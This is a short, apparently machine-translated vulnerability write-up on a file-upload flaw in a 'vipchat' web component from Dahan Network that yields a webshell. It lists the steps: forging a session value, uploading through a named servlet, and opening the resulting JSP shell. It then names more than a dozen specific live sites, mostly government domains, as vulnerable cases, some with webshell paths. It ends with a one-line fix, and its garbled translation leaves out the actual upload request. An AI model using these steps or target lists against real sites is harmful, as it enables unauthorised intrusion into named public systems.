Analysis of getshell vulnerability in VIP chat uploading on Dahan Network
Dahan network vipchat upload getshell Vulnerability
Step 1: forge the session value: clusterid
Address:/vipchat/VerifyCodeServlet? Var = clusterid
Send request: http://www.notedyy.com/vipchat/VerifyCodeServlet? Var = clusterid
Step 2: Construct the upload:
Address:/vipchat/servlet/upfile. do
Send request:
View the returned value, including the webshell path.
Step 3: Getshell:
Http://www.notedyy.com/vipchat/home/info/4640/subjectdesc/201509250304583550.jsp
Case: in the test of a, Huanggang City http://www.hg.gov.cn/vipchat/VerifyCodeServlet? Var = clusteridhttp: // www.hg.gov.cn/vipchat/home/info/3580/subjectdesc/201509241035074053.jsphttp://www.gzwd.gov.cnhttp://www.lzcgq.gov.cnhttp://www.sdadc.gov.cnhttp://www.sdfeeds.comhttp://www.sdsl.gov.cnhttp://www.sdvdc.gov.cnhttp://xmblh.sdxm.gov.cnhttp://www.sdbee.com http://www.xdxmw.com http://www.sdxm.gov.cn
Solution:
Restrict the File Upload type.